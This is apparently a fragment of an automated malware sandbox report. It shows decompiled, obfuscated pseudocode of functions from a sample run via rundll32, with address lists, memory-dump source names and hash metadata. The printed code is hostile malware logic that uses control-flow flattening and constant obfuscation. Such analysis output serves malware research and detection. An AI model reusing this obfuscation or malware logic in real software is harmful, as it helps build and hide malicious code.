					if(_t299 == 0x80cf0f0) {
						_t243 = E0034B782(_t271 + 8, _v4, _v8, _v12);
						_t301 =  &(_t301[2]);
						_t299 = 0xe2e5f52;
						_t298 = _t298 + _t243;
						goto L17;
					} else {
						if(_t299 == 0xa9f5c45) {
							_t248 = E0035274F();
							_t301 = _t301 - 0xc + 0xc;
							_t299 = 0x47dcd1e;
							_t298 = _t298 + _t248;
							goto L1;
						} else {
							if(_t299 != 0xe2e5f52) {
								goto L17;
							} else {
								_t270 = E0035274F();
								_t301 = _t301 - 0xc + 0xc;
								_t299 = 0xa9f5c45;
								_t298 = _t298 + _t270;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t299 != 0xe1ba840);
				goto L20;
			}















































                                                                                                                      0x0036146e
                                                                                                                      0x00361471
                                                                                                                      0x0036147b
                                                                                                                      0x00361483
                                                                                                                      0x0036148b
                                                                                                                      0x00361493
                                                                                                                      0x0036149b
                                                                                                                      0x003614a3
                                                                                                                      0x003614ab
                                                                                                                      0x003614b0
                                                                                                                      0x003614b8
                                                                                                                      0x003614c0
                                                                                                                      0x003614c8
                                                                                                                      0x003614d0
                                                                                                                      0x003614e1
                                                                                                                      0x003614e5
                                                                                                                      0x003614e7
                                                                                                                      0x003614ef
                                                                                                                      0x003614f1
                                                                                                                      0x003614f9
                                                                                                                      0x003614fe
                                                                                                                      0x00361503
                                                                                                                      0x0036150b
                                                                                                                      0x00361513
                                                                                                                      0x0036151b
                                                                                                                      0x00361523
                                                                                                                      0x0036152b
                                                                                                                      0x00361533
                                                                                                                      0x0036153b
                                                                                                                      0x00361543
                                                                                                                      0x0036154b
                                                                                                                      0x00361553
                                                                                                                      0x00361558
                                                                                                                      0x00361560
                                                                                                                      0x00361568
                                                                                                                      0x00361576
                                                                                                                      0x0036157b
                                                                                                                      0x00361585
                                                                                                                      0x0036158a
                                                                                                                      0x00361590
                                                                                                                      0x00361598
                                                                                                                      0x003615a5
                                                                                                                      0x003615a6
                                                                                                                      0x003615aa
                                                                                                                      0x003615b2
                                                                                                                      0x003615b7
                                                                                                                      0x003615bf
                                                                                                                      0x003615c7
                                                                                                                      0x003615cc
                                                                                                                      0x003615d4
                                                                                                                      0x003615dc
                                                                                                                      0x003615e4
                                                                                                                      0x003615ec
                                                                                                                      0x003615fa
                                                                                                                      0x00361603
                                                                                                                      0x00361607
                                                                                                                      0x0036160f
                                                                                                                      0x00361617
                                                                                                                      0x0036161f
                                                                                                                      0x00361624
                                                                                                                      0x0036162e
                                                                                                                      0x0036163c
                                                                                                                      0x00361641
                                                                                                                      0x00361647
                                                                                                                      0x00361654
                                                                                                                      0x0036165c
                                                                                                                      0x00361669
                                                                                                                      0x0036166c
                                                                                                                      0x00361670
                                                                                                                      0x00361678
                                                                                                                      0x00361680
                                                                                                                      0x00361690
                                                                                                                      0x00361699
                                                                                                                      0x0036169c
                                                                                                                      0x003616a0
                                                                                                                      0x003616a8
                                                                                                                      0x003616b0
                                                                                                                      0x003616c0
                                                                                                                      0x003616c4
                                                                                                                      0x003616cc
                                                                                                                      0x003616d4
                                                                                                                      0x003616dc
                                                                                                                      0x003616e4
                                                                                                                      0x003616ec
                                                                                                                      0x003616f1
                                                                                                                      0x003616f9
                                                                                                                      0x00361705
                                                                                                                      0x00361708
                                                                                                                      0x0036170c
                                                                                                                      0x00361714
                                                                                                                      0x0036171c
                                                                                                                      0x00361724
                                                                                                                      0x00361729
                                                                                                                      0x00361731
                                                                                                                      0x00361739
                                                                                                                      0x00361746
                                                                                                                      0x0036174a
                                                                                                                      0x00361752
                                                                                                                      0x0036175f
                                                                                                                      0x00361763
                                                                                                                      0x0036176d
                                                                                                                      0x00361771
                                                                                                                      0x00361779
                                                                                                                      0x00361781
                                                                                                                      0x00361786
                                                                                                                      0x0036178b
                                                                                                                      0x0036178b
                                                                                                                      0x00361793
                                                                                                                      0x00361793
                                                                                                                      0x00361793
                                                                                                                      0x00361793
                                                                                                                      0x00361795
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0036179b
                                                                                                                      0x00361824
                                                                                                                      0x00361829
                                                                                                                      0x0036182c
                                                                                                                      0x00361831
                                                                                                                      0x00000000
                                                                                                                      0x0036179d
                                                                                                                      0x003617a3
                                                                                                                      0x003618e1
                                                                                                                      0x003617a9
                                                                                                                      0x003617af
                                                                                                                      0x00361803
                                                                                                                      0x00361808
                                                                                                                      0x0036180b
                                                                                                                      0x0036180d
                                                                                                                      0x00000000
                                                                                                                      0x003617b1
                                                                                                                      0x003617b7
                                                                                                                      0x003617e9
                                                                                                                      0x00000000
                                                                                                                      0x003617b9
                                                                                                                      0x003617bf
                                                                                                                      0x00000000
                                                                                                                      0x003617c5
                                                                                                                      0x003617d8
                                                                                                                      0x003617dd
                                                                                                                      0x003617e0
                                                                                                                      0x003617e5
                                                                                                                      0x00000000
                                                                                                                      0x003617e5
                                                                                                                      0x003617bf
                                                                                                                      0x003617b7
                                                                                                                      0x003617af
                                                                                                                      0x003617a3
                                                                                                                      0x003618e3
                                                                                                                      0x003618ec
                                                                                                                      0x003618ec
                                                                                                                      0x0036183e
                                                                                                                      0x003618ad
                                                                                                                      0x003618b2
                                                                                                                      0x003618b5
                                                                                                                      0x003618ba
                                                                                                                      0x00000000
                                                                                                                      0x00361840
                                                                                                                      0x00361846
                                                                                                                      0x0036188a
                                                                                                                      0x0036188f
                                                                                                                      0x00361892
                                                                                                                      0x00361897
                                                                                                                      0x00000000
                                                                                                                      0x00361848
                                                                                                                      0x0036184e
                                                                                                                      0x00000000
                                                                                                                      0x00361850
                                                                                                                      0x00361863
                                                                                                                      0x00361868
                                                                                                                      0x0036186b
                                                                                                                      0x00361870
                                                                                                                      0x00000000
                                                                                                                      0x00361870
                                                                                                                      0x0036184e
                                                                                                                      0x00361846
                                                                                                                      0x00000000
                                                                                                                      0x003618bc
                                                                                                                      0x003618bc
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %{p$':Q$<U9?$fb$uy?${$s*$4
                                                                                                                      • API String ID: 0-3558008229
                                                                                                                      • Opcode ID: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction ID: 9fc4304230c44665484e53c336f918d0f115409ca9b0cca78bf9eea92fdec7d6
                                                                                                                      • Opcode Fuzzy Hash: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction Fuzzy Hash: 29B124729083819FC358DF69D58A40BFBF1BBD4344F158A2DF4999A220D3B5DA48CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034194C Relevance: 9.0, Strings: 7, Instructions: 223COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 78%
                                                                                                                      			E0034194C(void* __ecx, signed int __edx, void* __edi, void* __eflags, signed int _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr _v156;
				char _v176;
				short _v720;
				short _v722;
				char _v724;
				signed int _v768;
				char _v1288;
				char _v1808;
				void* _t336;
				signed int _t361;
				intOrPtr _t370;
				void* _t373;
				signed int _t379;
				signed int _t394;
				void* _t407;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				void* _t434;
				void* _t435;
				void* _t436;

				_t394 = __edx ^  *(__edi + 3);
				asm("int 0x55");
				_t435 = _t434 - 0x710;
				_t370 = _a8;
				_push(__edi);
				_push(_a20);
				if(__eflags == 0) {
					_push(_a16);
					_push(_a12);
					_push(_t370);
					_push(_a4);
					_push(_t394);
					_push(__ecx);
					E0034CF25(_t336);
					_v16 = 0x6f572e;
				}
				_t436 = _t435 + 0x1c;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 + 0xd52f;
				_t373 = 0x80f983c;
				_v16 = _v16 ^ 0x3310f03a;
				_v16 = _v16 ^ 0x33101333;
				_v60 = 0xed71dd;
				_v60 = _v60 ^ 0x2497a453;
				_t422 = 0x26;
				_v60 = _v60 * 0x72;
				_v60 = _v60 ^ 0x3eb60fda;
				_v112 = 0xa5b0b2;
				_v112 = _v112 + 0x8954;
				_v112 = _v112 ^ 0x00ada628;
				_v108 = 0xe5587e;
				_v108 = _v108 << 9;
				_v108 = _v108 ^ 0xcab3bbf0;
				_v92 = 0x4845fb;
				_v92 = _v92 + 0x365f;
				_v92 = _v92 + 0xdd1a;
				_v92 = _v92 ^ 0x004e95c0;
				_v88 = 0xa51f24;
				_v88 = _v88 ^ 0x4dc3992d;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x002183c7;
				_v28 = 0x92b1f2;
				_v28 = _v28 + 0xdb28;
				_v28 = _v28 ^ 0xc5c4fb2d;
				_v28 = _v28 + 0xffff07a3;
				_v28 = _v28 ^ 0xc5543e55;
				_v56 = 0x45fcf7;
				_v56 = _v56 ^ 0x18f8a820;
				_v56 = _v56 / _t422;
				_v56 = _v56 ^ 0x00a79737;
				_v72 = 0xd5567a;
				_v72 = _v72 ^ 0x96c46f64;
				_v72 = _v72 + 0x1123;
				_v72 = _v72 ^ 0x96131221;
				_v128 = 0xd7fcd2;
				_v128 = _v128 | 0x19fc7ba7;
				_v128 = _v128 ^ 0x19f2013f;
				_v36 = 0xb63dda;
				_v36 = _v36 | 0x57c3443c;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x000375d9;
				_v120 = 0x9784e5;
				_v120 = _v120 ^ 0x5442b457;
				_v120 = _v120 ^ 0x54d2e3fe;
				_v152 = 0x86b47c;
				_v152 = _v152 | 0x1a648f0d;
				_v152 = _v152 ^ 0x1ae2f95e;
				_v104 = 0xe16033;
				_v104 = _v104 + 0xffff0503;
				_v104 = _v104 ^ 0x00e7872e;
				_v140 = 0x7ced29;
				_v140 = _v140 + 0x937a;
				_v140 = _v140 ^ 0x00718bd8;
				_v148 = 0xa848b7;
				_v148 = _v148 ^ 0xa8d47762;
				_v148 = _v148 ^ 0xa87b6210;
				_v124 = 0xc4055c;
				_v124 = _v124 << 5;
				_v124 = _v124 ^ 0x1882bddf;
				_v80 = 0x58e97;
				_t423 = 0x7c;
				_v80 = _v80 / _t423;
				_v80 = _v80 + 0xffff9366;
				_v80 = _v80 ^ 0xfffe01cd;
				_v48 = 0x77db93;
				_t424 = 0x3a;
				_v48 = _v48 / _t424;
				_v48 = _v48 + 0xffffa5b4;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x00036e08;
				_v132 = 0x4854bc;
				_t425 = 0x4c;
				_v132 = _v132 * 0x24;
				_v132 = _v132 ^ 0x0a23127f;
				_v84 = 0x297997;
				_v84 = _v84 / _t425;
				_t426 = 0x45;
				_v84 = _v84 * 0x5e;
				_v84 = _v84 ^ 0x003e8360;
				_v24 = 0xba7a12;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x8e2fa782;
				_v24 = _v24 + 0xffffcaa3;
				_v24 = _v24 ^ 0xfad920cc;
				_v64 = 0xf87d94;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 4;
				_v64 = _v64 ^ 0x0002c2de;
				_v68 = 0x627eea;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 | 0x4b478a8f;
				_v68 = _v68 ^ 0x4b4b50ae;
				_v32 = 0x4d9af3;
				_v32 = _v32 + 0xffff3fdf;
				_v32 = _v32 | 0x07023235;
				_v32 = _v32 ^ 0xa9cb8ace;
				_v32 = _v32 ^ 0xae825d6e;
				_v144 = 0x2c231c;
				_v144 = _v144 ^ 0x372f588c;
				_v144 = _v144 ^ 0x37050cc1;
				_v40 = 0xed36d5;
				_v40 = _v40 / _t426;
				_v40 = _v40 + 0xffff2e56;
				_v40 = _v40 * 0xd;
				_v40 = _v40 ^ 0x002f5a10;
				_v20 = 0xb226b9;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x7ec33512;
				_v20 = _v20 ^ 0x86eef9df;
				_v20 = _v20 ^ 0xee6f0a5e;
				_v76 = 0xa2d2;
				_v76 = _v76 + 0xffff2403;
				_v76 = _v76 + 0xffff5c56;
				_v76 = _v76 ^ 0xfff84be5;
				_v12 = 0x61529e;
				_v12 = _v12 + 0x826f;
				_v12 = _v12 | 0x315ab852;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x0008d08d;
				_v136 = 0xbe89c0;
				_v136 = _v136 ^ 0x9f3b785a;
				_v136 = _v136 ^ 0x9f8a2ffd;
				_v116 = 0x9615af;
				_v116 = _v116 | 0x7dcb4113;
				_v116 = _v116 ^ 0x7dd5a359;
				_v100 = 0x787e8d;
				_t427 = 0xf;
				_v100 = _v100 * 0x78;
				_v100 = _v100 ^ 0x3874d75c;
				_v96 = 0xce992e;
				_v96 = _v96 << 9;
				_v96 = _v96 | 0x5045bce0;
				_v96 = _v96 ^ 0xdd755c45;
				_v52 = 0xe3c541;
				_t419 = _v100;
				_v52 = _v52 / _t427;
				_v52 = _v52 + 0xffff4fb9;
				_v52 = _v52 | 0x0dbfd8b3;
				_v52 = _v52 ^ 0x0db5e533;
				_v44 = 0xd3f0eb;
				_v44 = _v44 | 0x02fbd4da;
				_v44 = _v44 >> 6;
				_v44 = _v44 + 0xffffa89e;
				_v44 = _v44 ^ 0x000772a1;
				while(1) {
					L6:
					_t407 = 0x2e;
					L7:
					while(_t373 != 0xcf103a) {
						if(_t373 == 0x80f983c) {
							_v156 = _t370;
							_t373 = 0xcf103a;
							continue;
						} else {
							if(_t373 == 0x8bdeaee) {
								__eflags = _v768 & _v16;
								if(__eflags == 0) {
									_t361 = _a16( &_v768,  &_v176);
									asm("sbb ecx, ecx");
									_t379 =  ~_t361 & 0x01058edd;
									goto L14;
								} else {
									__eflags = _v724 - _t407;
									if(_v724 != _t407) {
										L23:
										__eflags = _a4;
										if(__eflags != 0) {
											_push(_v48);
											_push(_v80);
											_push(0x341264);
											E0034E7CE(E0034AB66(_v148, _v124, __eflags), __eflags, _v132, _t370, _v148, _v84, _v24, _v64, _v68,  &_v724);
											_push(_v40);
											_push(_a16);
											_t311 =  &_a12; // 0xee6f0a5e
											_push( *_t311);
											_push( &_v1808);
											_push(_a4);
											L1();
											_t436 = _t436 + 0x40;
											_t361 = E0034AE03(_v20, _v76, _v12, _t364);
											_t407 = 0x2e;
										}
									} else {
										__eflags = _v722;
										if(__eflags != 0) {
											__eflags = _v722 - _t407;
											if(_v722 != _t407) {
												goto L23;
											} else {
												__eflags = _v720;
												if(__eflags != 0) {
													goto L23;
												}
											}
										}
									}
									_t373 = 0xfa4bede;
									continue;
								}
								L32:
							} else {
								if(_t373 == 0x8fff290) {
									_t361 = E0035BAEA( &_v1288, _v152,  &_v768, _v104, _v140);
									_t419 = _t361;
									_t436 = _t436 + 0xc;
									__eflags = _t361 - 0xffffffff;
									if(__eflags != 0) {
										_t373 = 0x8bdeaee;
										goto L6;
									}
								} else {
									if(_t373 == 0xe9f3001) {
										_t361 = E00358C35(_v100, _t419, _v96, _v52, _v44);
									} else {
										if(_t373 != 0xfa4bede) {
											L28:
											__eflags = _t373 - 0x71f77cc;
											if(__eflags != 0) {
												continue;
											} else {
											}
										} else {
											_t278 =  &_v768; // 0x15f5595f
											_t361 = E0035F7FC(_v136, _t419, _v116, _t278);
											asm("sbb ecx, ecx");
											_t379 =  ~_t361 & 0xfa1ebaed;
											L14:
											_t373 = _t379 + 0xe9f3001;
											while(1) {
												L6:
												_t407 = 0x2e;
												goto L7;
											}
										}
									}
								}
							}
						}
						return _t361;
						goto L32;
					}
					_push(_v92);
					_push(_v108);
					_push(0x3412d4);
					E00343BF8(_v28, __eflags, E0034AB66(_v60, _v112, __eflags), _v56, _v72,  &_v1288, _t370);
					E0034AE03(_v128, _v36, _v120, _t354);
					_t436 = _t436 + 0x28;
					_t373 = 0x8fff290;
					_t407 = 0x2e;
					goto L28;
				}
			}































































                                                                                                                      0x0034194c
                                                                                                                      0x0034194f
                                                                                                                      0x00341953
                                                                                                                      0x0034195a
                                                                                                                      0x0034195e
                                                                                                                      0x0034195f
                                                                                                                      0x00341960
                                                                                                                      0x00341962
                                                                                                                      0x00341965
                                                                                                                      0x00341968
                                                                                                                      0x00341969
                                                                                                                      0x0034196c
                                                                                                                      0x0034196d
                                                                                                                      0x0034196e
                                                                                                                      0x00341973
                                                                                                                      0x00341973
                                                                                                                      0x0034197a
                                                                                                                      0x0034197d
                                                                                                                      0x00341983
                                                                                                                      0x0034198a
                                                                                                                      0x0034198f
                                                                                                                      0x00341996
                                                                                                                      0x0034199d
                                                                                                                      0x003419a4
                                                                                                                      0x003419b1
                                                                                                                      0x003419b2
                                                                                                                      0x003419b5
                                                                                                                      0x003419bc
                                                                                                                      0x003419c3
                                                                                                                      0x003419ca
                                                                                                                      0x003419d1
                                                                                                                      0x003419d8
                                                                                                                      0x003419dc
                                                                                                                      0x003419e3
                                                                                                                      0x003419ea
                                                                                                                      0x003419f1
                                                                                                                      0x003419f8
                                                                                                                      0x003419ff
                                                                                                                      0x00341a06
                                                                                                                      0x00341a0d
                                                                                                                      0x00341a11
                                                                                                                      0x00341a18
                                                                                                                      0x00341a1f
                                                                                                                      0x00341a26
                                                                                                                      0x00341a2d
                                                                                                                      0x00341a34
                                                                                                                      0x00341a3b
                                                                                                                      0x00341a42
                                                                                                                      0x00341a4e
                                                                                                                      0x00341a51
                                                                                                                      0x00341a58
                                                                                                                      0x00341a5f
                                                                                                                      0x00341a66
                                                                                                                      0x00341a6d
                                                                                                                      0x00341a74
                                                                                                                      0x00341a7b
                                                                                                                      0x00341a82
                                                                                                                      0x00341a89
                                                                                                                      0x00341a90
                                                                                                                      0x00341a97
                                                                                                                      0x00341a9b
                                                                                                                      0x00341a9f
                                                                                                                      0x00341aa6
                                                                                                                      0x00341aad
                                                                                                                      0x00341ab4
                                                                                                                      0x00341abb
                                                                                                                      0x00341ac5
                                                                                                                      0x00341acf
                                                                                                                      0x00341ad9
                                                                                                                      0x00341ae0
                                                                                                                      0x00341ae7
                                                                                                                      0x00341aee
                                                                                                                      0x00341af8
                                                                                                                      0x00341b02
                                                                                                                      0x00341b0c
                                                                                                                      0x00341b16
                                                                                                                      0x00341b20
                                                                                                                      0x00341b2a
                                                                                                                      0x00341b31
                                                                                                                      0x00341b35
                                                                                                                      0x00341b3e
                                                                                                                      0x00341b4a
                                                                                                                      0x00341b4f
                                                                                                                      0x00341b54
                                                                                                                      0x00341b5b
                                                                                                                      0x00341b62
                                                                                                                      0x00341b6c
                                                                                                                      0x00341b71
                                                                                                                      0x00341b76
                                                                                                                      0x00341b7d
                                                                                                                      0x00341b81
                                                                                                                      0x00341b88
                                                                                                                      0x00341b93
                                                                                                                      0x00341b96
                                                                                                                      0x00341b99
                                                                                                                      0x00341ba0
                                                                                                                      0x00341bae
                                                                                                                      0x00341bb5
                                                                                                                      0x00341bb6
                                                                                                                      0x00341bb9
                                                                                                                      0x00341bc0
                                                                                                                      0x00341bc7
                                                                                                                      0x00341bcb
                                                                                                                      0x00341bd2
                                                                                                                      0x00341bd9
                                                                                                                      0x00341be0
                                                                                                                      0x00341be7
                                                                                                                      0x00341beb
                                                                                                                      0x00341bef
                                                                                                                      0x00341bf6
                                                                                                                      0x00341bfd
                                                                                                                      0x00341c01
                                                                                                                      0x00341c08
                                                                                                                      0x00341c0f
                                                                                                                      0x00341c16
                                                                                                                      0x00341c1d
                                                                                                                      0x00341c24
                                                                                                                      0x00341c2b
                                                                                                                      0x00341c32
                                                                                                                      0x00341c3c
                                                                                                                      0x00341c46
                                                                                                                      0x00341c50
                                                                                                                      0x00341c5c
                                                                                                                      0x00341c5f
                                                                                                                      0x00341c6a
                                                                                                                      0x00341c6d
                                                                                                                      0x00341c74
                                                                                                                      0x00341c7b
                                                                                                                      0x00341c7f
                                                                                                                      0x00341c86
                                                                                                                      0x00341c8d
                                                                                                                      0x00341c94
                                                                                                                      0x00341c9b
                                                                                                                      0x00341ca2
                                                                                                                      0x00341ca9
                                                                                                                      0x00341cb0
                                                                                                                      0x00341cb7
                                                                                                                      0x00341cbe
                                                                                                                      0x00341cc5
                                                                                                                      0x00341cc9
                                                                                                                      0x00341cd0
                                                                                                                      0x00341cda
                                                                                                                      0x00341ce6
                                                                                                                      0x00341cf0
                                                                                                                      0x00341cf7
                                                                                                                      0x00341cfe
                                                                                                                      0x00341d05
                                                                                                                      0x00341d12
                                                                                                                      0x00341d13
                                                                                                                      0x00341d16
                                                                                                                      0x00341d1d
                                                                                                                      0x00341d24
                                                                                                                      0x00341d28
                                                                                                                      0x00341d2f
                                                                                                                      0x00341d36
                                                                                                                      0x00341d42
                                                                                                                      0x00341d45
                                                                                                                      0x00341d48
                                                                                                                      0x00341d4f
                                                                                                                      0x00341d56
                                                                                                                      0x00341d5d
                                                                                                                      0x00341d64
                                                                                                                      0x00341d6b
                                                                                                                      0x00341d6f
                                                                                                                      0x00341d76
                                                                                                                      0x00341d7d
                                                                                                                      0x00341d7d
                                                                                                                      0x00341d7f
                                                                                                                      0x00000000
                                                                                                                      0x00341d80
                                                                                                                      0x00341d92
                                                                                                                      0x00341f11
                                                                                                                      0x00341f17
                                                                                                                      0x00000000
                                                                                                                      0x00341d98
                                                                                                                      0x00341d9e
                                                                                                                      0x00341e2d
                                                                                                                      0x00341e33
                                                                                                                      0x00341efd
                                                                                                                      0x00341f04
                                                                                                                      0x00341f06
                                                                                                                      0x00000000
                                                                                                                      0x00341e39
                                                                                                                      0x00341e39
                                                                                                                      0x00341e40
                                                                                                                      0x00341e69
                                                                                                                      0x00341e69
                                                                                                                      0x00341e6d
                                                                                                                      0x00341e6f
                                                                                                                      0x00341e72
                                                                                                                      0x00341e7e
                                                                                                                      0x00341ead
                                                                                                                      0x00341eb2
                                                                                                                      0x00341ec1
                                                                                                                      0x00341ec7
                                                                                                                      0x00341ec7
                                                                                                                      0x00341eca
                                                                                                                      0x00341ecb
                                                                                                                      0x00341ece
                                                                                                                      0x00341ed3
                                                                                                                      0x00341ee0
                                                                                                                      0x00341ee9
                                                                                                                      0x00341ee9
                                                                                                                      0x00341e42
                                                                                                                      0x00341e42
                                                                                                                      0x00341e4a
                                                                                                                      0x00341e4c
                                                                                                                      0x00341e53
                                                                                                                      0x00000000
                                                                                                                      0x00341e55
                                                                                                                      0x00341e55
                                                                                                                      0x00341e5d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00341e5d
                                                                                                                      0x00341e53
                                                                                                                      0x00341e4a
                                                                                                                      0x00341e5f
                                                                                                                      0x00000000
                                                                                                                      0x00341e5f
                                                                                                                      0x00000000
                                                                                                                      0x00341da4
                                                                                                                      0x00341daa
                                                                                                                      0x00341e0d
                                                                                                                      0x00341e12
                                                                                                                      0x00341e14
                                                                                                                      0x00341e17
                                                                                                                      0x00341e1a
                                                                                                                      0x00341e20
                                                                                                                      0x00000000
                                                                                                                      0x00341e20
                                                                                                                      0x00341dac
                                                                                                                      0x00341db2
                                                                                                                      0x00341f8c
                                                                                                                      0x00341db8
                                                                                                                      0x00341dbe
                                                                                                                      0x00341f70
                                                                                                                      0x00341f70
                                                                                                                      0x00341f76
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00341f7c
                                                                                                                      0x00341dc4
                                                                                                                      0x00341dc4
                                                                                                                      0x00341dd6
                                                                                                                      0x00341de1
                                                                                                                      0x00341de3
                                                                                                                      0x00341de9
                                                                                                                      0x00341de9
                                                                                                                      0x00341d7d
                                                                                                                      0x00341d7d
                                                                                                                      0x00341d7f
                                                                                                                      0x00000000
                                                                                                                      0x00341d7f
                                                                                                                      0x00341d7d
                                                                                                                      0x00341dbe
                                                                                                                      0x00341db2
                                                                                                                      0x00341daa
                                                                                                                      0x00341d9e
                                                                                                                      0x00341f9a
                                                                                                                      0x00000000
                                                                                                                      0x00341f9a
                                                                                                                      0x00341f21
                                                                                                                      0x00341f24
                                                                                                                      0x00341f2d
                                                                                                                      0x00341f51
                                                                                                                      0x00341f60
                                                                                                                      0x00341f65
                                                                                                                      0x00341f68
                                                                                                                      0x00341f6f
                                                                                                                      0x00000000
                                                                                                                      0x00341f6f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )|$.Wo$3`$^o$_6$~X$~b
                                                                                                                      • API String ID: 0-1767839032
                                                                                                                      • Opcode ID: eef91fe68660d8fda0360ca97d0afbe7e47c452db0b4903d5e0a85f4f344d683
                                                                                                                      • Instruction ID: acd88d3a237c3646ff80dfb56c5865fe0902bce998f322992c1928a0913254c4
                                                                                                                      • Opcode Fuzzy Hash: eef91fe68660d8fda0360ca97d0afbe7e47c452db0b4903d5e0a85f4f344d683
                                                                                                                      • Instruction Fuzzy Hash: 5DC100B1C0131DDBDB69CFA5D98A5DEBFB1FB00318F208159D116BA264C7B84A8ACF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 003504B8 Relevance: 9.0, Strings: 7, Instructions: 214COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E003504B8() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t191;
				signed int _t193;
				signed int _t194;
				void* _t198;
				void* _t219;
				intOrPtr _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				intOrPtr _t231;
				intOrPtr* _t232;
				signed int _t233;
				signed int* _t234;

				_t234 =  &_v88;
				_v12 = 0x2790ea;
				_v8 = 0xba5a5c;
				_t198 = 0x3d69ab1;
				_t224 = 0;
				_v4 = 0;
				_v60 = 0x2fd7ed;
				_v60 = _v60 | 0x771a9d11;
				_t225 = 0x45;
				_v60 = _v60 * 0x4e;
				_v60 = _v60 ^ 0x55773f16;
				_v40 = 0xe86db6;
				_v40 = _v40 | 0xabe4da9c;
				_v40 = _v40 ^ 0xabe3ff81;
				_v84 = 0x4e4c43;
				_v84 = _v84 + 0x2260;
				_v84 = _v84 / _t225;
				_t226 = 0x36;
				_v84 = _v84 / _t226;
				_v84 = _v84 ^ 0x000c99de;
				_v36 = 0x2c2e8d;
				_v36 = _v36 ^ 0x89bc573f;
				_v36 = _v36 ^ 0x899e3850;
				_v56 = 0xc456b8;
				_v56 = _v56 << 1;
				_t227 = 0x7a;
				_v56 = _v56 / _t227;
				_v56 = _v56 ^ 0x000dd00d;
				_v24 = 0x6eec6c;
				_v24 = _v24 * 0x67;
				_v24 = _v24 ^ 0x2ca24ccd;
				_v28 = 0xbd5c18;
				_v28 = _v28 + 0xd697;
				_v28 = _v28 ^ 0x00bf4353;
				_v32 = 0x8ab54f;
				_v32 = _v32 * 0x47;
				_v32 = _v32 ^ 0x267a3e13;
				_v88 = 0x583e0f;
				_v88 = _v88 >> 8;
				_v88 = _v88 + 0xffff5904;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xb14dc739;
				_v44 = 0x7902f;
				_v44 = _v44 + 0xffff35ef;
				_v44 = _v44 ^ 0x000a0038;
				_v64 = 0xab1413;
				_v64 = _v64 + 0xffff0fb9;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0xaa2b0b8a;
				_v76 = 0x32b087;
				_v76 = _v76 | 0x42a79f0a;
				_v76 = _v76 ^ 0x7a54616b;
				_v76 = _v76 + 0x85;
				_v76 = _v76 ^ 0x38e777a2;
				_v20 = 0xba9969;
				_v20 = _v20 | 0x60b184e2;
